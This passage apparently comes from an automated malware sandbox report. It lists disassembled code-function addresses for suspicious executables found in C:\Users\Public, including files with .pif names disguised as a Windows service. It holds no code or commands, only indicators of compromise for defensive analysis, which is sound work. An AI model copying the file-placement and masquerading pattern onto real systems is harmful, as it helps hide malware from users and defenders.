Source: C:\Users\Public\ger.exe	Code function: 14_2_00007FF6558867A0		14_2_00007FF6558867A0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF1C120		25_2_00007FF67DF1C120
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF1BC10		25_2_00007FF67DF1BC10
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF43800		25_2_00007FF67DF43800
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF1F020		25_2_00007FF67DF1F020
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE42F38		25_2_00007FF67DE42F38
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF1CCB8		25_2_00007FF67DF1CCB8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC5F04		25_2_00007FF67DEC5F04
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEB9EE4		25_2_00007FF67DEB9EE4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE81ED0		25_2_00007FF67DE81ED0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBDEB0		25_2_00007FF67DEBDEB0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE8DEA4		25_2_00007FF67DE8DEA4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBBE70		25_2_00007FF67DEBBE70
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC1E2C		25_2_00007FF67DEC1E2C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE65DF7		25_2_00007FF67DE65DF7
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE41DE8		25_2_00007FF67DE41DE8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DECBDA0		25_2_00007FF67DECBDA0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE91D70		25_2_00007FF67DE91D70
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEE7D70		25_2_00007FF67DEE7D70
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE89D6C		25_2_00007FF67DE89D6C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF3DD84		25_2_00007FF67DF3DD84
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE9C0B8		25_2_00007FF67DE9C0B8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF02084		25_2_00007FF67DF02084
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE68080		25_2_00007FF67DE68080
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE98018		25_2_00007FF67DE98018
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEE9FF8		25_2_00007FF67DEE9FF8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE31F80		25_2_00007FF67DE31F80
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEFBB28		25_2_00007FF67DEFBB28
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE97AC8		25_2_00007FF67DE97AC8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE47AB4		25_2_00007FF67DE47AB4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEE9A58		25_2_00007FF67DEE9A58
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE81A60		25_2_00007FF67DE81A60
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEABA48		25_2_00007FF67DEABA48
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE63A40		25_2_00007FF67DE63A40
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE31A10		25_2_00007FF67DE31A10
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF3FC90		25_2_00007FF67DF3FC90
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE5F9B8		25_2_00007FF67DE5F9B8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEB19AC		25_2_00007FF67DEB19AC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBF990		25_2_00007FF67DEBF990
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF27938		25_2_00007FF67DF27938
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF2994C		25_2_00007FF67DF2994C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE6DD20		25_2_00007FF67DE6DD20
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE45D08		25_2_00007FF67DE45D08
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE8BCE8		25_2_00007FF67DE8BCE8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE69CD0		25_2_00007FF67DE69CD0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEF9CC0		25_2_00007FF67DEF9CC0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE4BCA4		25_2_00007FF67DE4BCA4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEB1C90		25_2_00007FF67DEB1C90
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE83C60		25_2_00007FF67DE83C60
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE8FC34		25_2_00007FF67DE8FC34
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE6FC20		25_2_00007FF67DE6FC20
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEE3C10		25_2_00007FF67DEE3C10
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE9DBF0		25_2_00007FF67DE9DBF0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE59BC8		25_2_00007FF67DE59BC8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE35BA4		25_2_00007FF67DE35BA4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEA1B84		25_2_00007FF67DEA1B84
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE3FB84		25_2_00007FF67DE3FB84
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC7B74		25_2_00007FF67DEC7B74
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEDFB50		25_2_00007FF67DEDFB50
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBF6D8		25_2_00007FF67DEBF6D8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE876B0		25_2_00007FF67DE876B0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEED6A0		25_2_00007FF67DEED6A0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEE7678		25_2_00007FF67DEE7678
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF05660		25_2_00007FF67DF05660
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE5D660		25_2_00007FF67DE5D660
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE75648		25_2_00007FF67DE75648
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE3F610		25_2_00007FF67DE3F610
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEB95FC		25_2_00007FF67DEB95FC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE955F0		25_2_00007FF67DE955F0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE6B58C		25_2_00007FF67DE6B58C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE6156C		25_2_00007FF67DE6156C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF09580		25_2_00007FF67DF09580
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE858CC		25_2_00007FF67DE858CC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE97890		25_2_00007FF67DE97890
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF03874		25_2_00007FF67DF03874
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DECD858		25_2_00007FF67DECD858
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC184C		25_2_00007FF67DEC184C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF13638		25_2_00007FF67DF13638
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE51830		25_2_00007FF67DE51830
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEE3820		25_2_00007FF67DEE3820
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE4F800		25_2_00007FF67DE4F800
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF17678		25_2_00007FF67DF17678
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE9D7F0		25_2_00007FF67DE9D7F0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE717D4		25_2_00007FF67DE717D4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEA77C8		25_2_00007FF67DEA77C8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE89790		25_2_00007FF67DE89790
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE4B788		25_2_00007FF67DE4B788
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF0D6DC		25_2_00007FF67DF0D6DC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEB3760		25_2_00007FF67DEB3760
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC5318		25_2_00007FF67DEC5318
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEA92D8		25_2_00007FF67DEA92D8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE8D2C0		25_2_00007FF67DE8D2C0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF1B3AC		25_2_00007FF67DF1B3AC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE992C4		25_2_00007FF67DE992C4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE3F2C0		25_2_00007FF67DE3F2C0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF233D0		25_2_00007FF67DF233D0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF333D4		25_2_00007FF67DF333D4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEE5290		25_2_00007FF67DEE5290
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE831E0		25_2_00007FF67DE831E0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE811C8		25_2_00007FF67DE811C8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF294A8		25_2_00007FF67DF294A8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE4D1B8		25_2_00007FF67DE4D1B8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBF168		25_2_00007FF67DEBF168
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEAF520		25_2_00007FF67DEAF520
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF014F0		25_2_00007FF67DF014F0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE554A0		25_2_00007FF67DE554A0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEE9494		25_2_00007FF67DEE9494
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE97478		25_2_00007FF67DE97478
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEDD460		25_2_00007FF67DEDD460
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE35438		25_2_00007FF67DE35438
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE7D440		25_2_00007FF67DE7D440
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE7F434		25_2_00007FF67DE7F434
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEAD410		25_2_00007FF67DEAD410
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE373F8		25_2_00007FF67DE373F8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF0D2B4		25_2_00007FF67DF0D2B4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE5B36C		25_2_00007FF67DE5B36C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE67340		25_2_00007FF67DE67340
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE58F1C		25_2_00007FF67DE58F1C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE36EF4		25_2_00007FF67DE36EF4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE6EED4		25_2_00007FF67DE6EED4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE5EDA4		25_2_00007FF67DE5EDA4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEA6D7C		25_2_00007FF67DEA6D7C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEF511C		25_2_00007FF67DEF511C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF12D6C		25_2_00007FF67DF12D6C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE4B09C		25_2_00007FF67DE4B09C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE8D094		25_2_00007FF67DE8D094
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE7107C		25_2_00007FF67DE7107C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE31030		25_2_00007FF67DE31030
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF14E58		25_2_00007FF67DF14E58
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF18EAC		25_2_00007FF67DF18EAC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED4F94		25_2_00007FF67DED4F94
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE64F90		25_2_00007FF67DE64F90
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE84B30		25_2_00007FF67DE84B30
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEB6A84		25_2_00007FF67DEB6A84
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBEA7C		25_2_00007FF67DEBEA7C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF04A40		25_2_00007FF67DF04A40
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF08C58		25_2_00007FF67DF08C58
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBAA00		25_2_00007FF67DEBAA00
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE9E9F0		25_2_00007FF67DE9E9F0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE909EC		25_2_00007FF67DE909EC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF3CC8C		25_2_00007FF67DF3CC8C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE88990		25_2_00007FF67DE88990
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE96984		25_2_00007FF67DE96984
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF28CF4		25_2_00007FF67DF28CF4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE32940		25_2_00007FF67DE32940
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE88D2C		25_2_00007FF67DE88D2C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE92D18		25_2_00007FF67DE92D18
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE8CD10		25_2_00007FF67DE8CD10
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC2CF8		25_2_00007FF67DEC2CF8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE48D00		25_2_00007FF67DE48D00
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DECCCA8		25_2_00007FF67DECCCA8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEACC80		25_2_00007FF67DEACC80
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF0A9F0		25_2_00007FF67DF0A9F0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE80C28		25_2_00007FF67DE80C28
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE3AC08		25_2_00007FF67DE3AC08
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF24A58		25_2_00007FF67DF24A58
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF1AA58		25_2_00007FF67DF1AA58
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE7CBFC		25_2_00007FF67DE7CBFC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEA8BD4		25_2_00007FF67DEA8BD4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEE6B94		25_2_00007FF67DEE6B94
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE54B68		25_2_00007FF67DE54B68
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF26750		25_2_00007FF67DF26750
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEAC6F8		25_2_00007FF67DEAC6F8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE9C6D0		25_2_00007FF67DE9C6D0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE98630		25_2_00007FF67DE98630
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEFC630		25_2_00007FF67DEFC630
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF22854		25_2_00007FF67DF22854
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE405E0		25_2_00007FF67DE405E0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF148C4		25_2_00007FF67DF148C4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF108C8		25_2_00007FF67DF108C8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DECE57C		25_2_00007FF67DECE57C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE82580		25_2_00007FF67DE82580
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE68570		25_2_00007FF67DE68570
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE9655C		25_2_00007FF67DE9655C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF04538		25_2_00007FF67DF04538
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF285A8		25_2_00007FF67DF285A8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF385EC		25_2_00007FF67DF385EC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBE844		25_2_00007FF67DEBE844
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBC7F0		25_2_00007FF67DEBC7F0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEB27D0		25_2_00007FF67DEB27D0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEE07D0		25_2_00007FF67DEE07D0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF1234C		25_2_00007FF67DF1234C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE8E29C		25_2_00007FF67DE8E29C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE5227C		25_2_00007FF67DE5227C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEA6280		25_2_00007FF67DEA6280
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF1E430		25_2_00007FF67DF1E430
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF4842F		25_2_00007FF67DF4842F
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEF821C		25_2_00007FF67DEF821C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBA1E8		25_2_00007FF67DEBA1E8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF10490		25_2_00007FF67DF10490
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE8C1D0		25_2_00007FF67DE8C1D0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF184D8		25_2_00007FF67DF184D8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE38170		25_2_00007FF67DE38170
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE50140		25_2_00007FF67DE50140
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE3C520		25_2_00007FF67DE3C520
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBE4F0		25_2_00007FF67DEBE4F0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE444E0		25_2_00007FF67DE444E0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEA24D4		25_2_00007FF67DEA24D4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE764A8		25_2_00007FF67DE764A8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC8488		25_2_00007FF67DEC8488
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE88484		25_2_00007FF67DE88484
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF441F8		25_2_00007FF67DF441F8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEAA450		25_2_00007FF67DEAA450
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEAC450		25_2_00007FF67DEAC450
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE3A424		25_2_00007FF67DE3A424
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEB8414		25_2_00007FF67DEB8414
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE54410		25_2_00007FF67DE54410
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF14274		25_2_00007FF67DF14274
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC43D0		25_2_00007FF67DEC43D0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE90398		25_2_00007FF67DE90398
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE7E3A0		25_2_00007FF67DE7E3A0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC6374		25_2_00007FF67DEC6374
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_028B8359		28_2_028B8359
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_028920C4		28_2_028920C4
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA0DB62		28_2_1BA0DB62
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA4332B		28_2_1BA4332B
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA2E2FB		28_2_1BA2E2FB
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA361F0		28_2_1BA361F0
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA23946		28_2_1BA23946
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA278FE		28_2_1BA278FE
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA2E0CC		28_2_1BA2E0CC
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA26FEA		28_2_1BA26FEA
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA28762		28_2_1BA28762
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA2DE9D		28_2_1BA2DE9D
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA25E5E		28_2_1BA25E5E
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA2E558		28_2_1BA2E558
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA274E6		28_2_1BA274E6
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BCAA54		29_2_00007FF789BCAA54
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BC8DF8		29_2_00007FF789BC8DF8
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BD5554		29_2_00007FF789BD5554
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BD7854		29_2_00007FF789BD7854
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BD37D8		29_2_00007FF789BD37D8
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BC3410		29_2_00007FF789BC3410
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BC6EE4		29_2_00007FF789BC6EE4
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BE7F00		29_2_00007FF789BE7F00
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BD0A6C		29_2_00007FF789BD0A6C
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BCE680		29_2_00007FF789BCE680
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BEEE88		29_2_00007FF789BEEE88
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BD4224		29_2_00007FF789BD4224
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BC2220		29_2_00007FF789BC2220
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BC4A30		29_2_00007FF789BC4A30
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BEAA30		29_2_00007FF789BEAA30
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BC5240		29_2_00007FF789BC5240
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BC7650		29_2_00007FF789BC7650
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BCD250		29_2_00007FF789BCD250
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BC9E50		29_2_00007FF789BC9E50
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BCCE10		29_2_00007FF789BCCE10
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BC81D4		29_2_00007FF789BC81D4
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BED9D0		29_2_00007FF789BED9D0
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BC7D30		29_2_00007FF789BC7D30
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BF1538		29_2_00007FF789BF1538
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BCB0D8		29_2_00007FF789BCB0D8
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BC8510		29_2_00007FF789BC8510
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BD18D4		29_2_00007FF789BD18D4
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BC1884		29_2_00007FF789BC1884
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BC2C48		29_2_00007FF789BC2C48
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BEAC4C		29_2_00007FF789BEAC4C
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BC6BE0		29_2_00007FF789BC6BE0
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BEAFBC		29_2_00007FF789BEAFBC
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BC5B70		29_2_00007FF789BC5B70
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BC3F90		29_2_00007FF789BC3F90
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BC372C		29_2_00007FF789BC372C
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BC9B50		29_2_00007FF789BC9B50
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_029A20C4		36_2_029A20C4
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_210B4159		36_2_210B4159
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_21098168		36_2_21098168
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_210A61F0		36_2_210A61F0
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_2109E0CC		36_2_2109E0CC
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_2107F0FA		36_2_2107F0FA
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_210B332B		36_2_210B332B
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_2108739D		36_2_2108739D
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_2109E2FB		36_2_2109E2FB
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_2109E558		36_2_2109E558
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_210974E6		36_2_210974E6
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_21098770		36_2_21098770
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_21093946		36_2_21093946
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_210AD9C9		36_2_210AD9C9
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_210978FE		36_2_210978FE
